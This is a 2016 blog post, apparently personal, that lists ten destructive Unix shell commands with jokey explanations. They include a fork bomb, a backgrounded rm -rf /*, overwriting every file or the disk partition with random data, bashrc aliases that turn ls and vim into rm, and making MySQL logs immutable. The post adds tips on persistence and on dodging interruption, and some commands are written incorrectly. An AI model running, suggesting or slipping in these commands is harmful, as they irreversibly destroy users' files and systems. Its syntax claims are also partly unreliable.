#54 The Ten Commands

@ 07 Mar 2016

These are the single most dangerous commands I could come up with (except for the fork bomb of course, which i did not come up with).



An explanation on how these commands work can be found below. Some notes though:



- Naturally all commands have been properly tested (in virtual machines);

- Most of these commands run just fine without root privileges.



Either it runs just for everything the current user can reach (home folders etc), or it is not affected by lesser privileges, or: well, just be glad sudo requires a password in your setup (right? Right? Tam tam tammm).



#1 :(){ :|:& };:

Classic fork bomb. BAM. (for the uninitiated; a fork bomb keeps forking itself, eating resources until the system dies.) For bonus points; configure it to run when the system starts.



#2 rm -rf /* &

It starts as a classic; remove everything recursively, starting at /. Then two things:

- One; the classic `rm -rf /` is actually prevented from running by rm. So we rm on /* to bypass this.

- Second; we fork it (& at the end). Bonus points for this part: The user can only stop this before the ps and/or kill tools have been removed from the system.



#3 find /* -exec dd if=/dev/urandom of={} count=666 \;

Find everything recursively and do something fun with it. Fun, or random. Hmh.



#4 echo "whoop" > /dev/sda1

Turns out you can write /anything/ to a disk as long as you have sudo rights. Neato!



#5 mv ~/* /dev/null

Did you know you can't move directories into /dev/null? Yeah, just files. So we move all files in the home dir to /dev/null. To counteract the disappointment there you could spice this one up by tying it to find, thus doing it recursively for all files.



#6 echo 'ls=rm -rf' > ~/.bashrc && . ~/.bashrc

I *really* love this one. Put an alias on ls pointing to rm -rf. Any ls you are attemping on any dirs or files will actually not show you anything, but in fact remove it. At this point ls will not output anything on a successful removal, so most likely you'll try a few directories to see why it doesn't give an output. Yay!



#7 "" | tee ~/.*

This might be the subtlest one, it's not entirely obvious at first sight what it's doing. It pipes the ultimate nothing to all hidden files in the home dir. I actually originally thought of doing `> ~/.*` to shorten the command a bit, but it turns out piping can't be done toward multiple files. So you'd have to use tee.



#8 dd if=/dev/urandom of=/dev/sda1 &

Just shake up the main partition a bit. This would be one of the weakest commands here, since it requires root privileges (and is kinda obvious).



#9 echo 'vim=rm' > ~/.bashrc && . ~/.bashrc

A variation on #6, where we make an alias from vim to rm. Few bonus points though: You won't come across this issue as fast, and there is a good chance someone is actively working on a server, looking at some config or whatever. Aaaaaand it's gone.



#10 chattr +i /var/log/mysql.*

The immutability attribute is not all that well known. Most people would know, however, that mysql cannot run if it cannot log anything. As soon as the logs become unwritable mysql shuts down. So we change the immutability attribute on the logs. Have fun looking for the -i attribute!



If you have any remarks or additions, drop me a line on Twitter.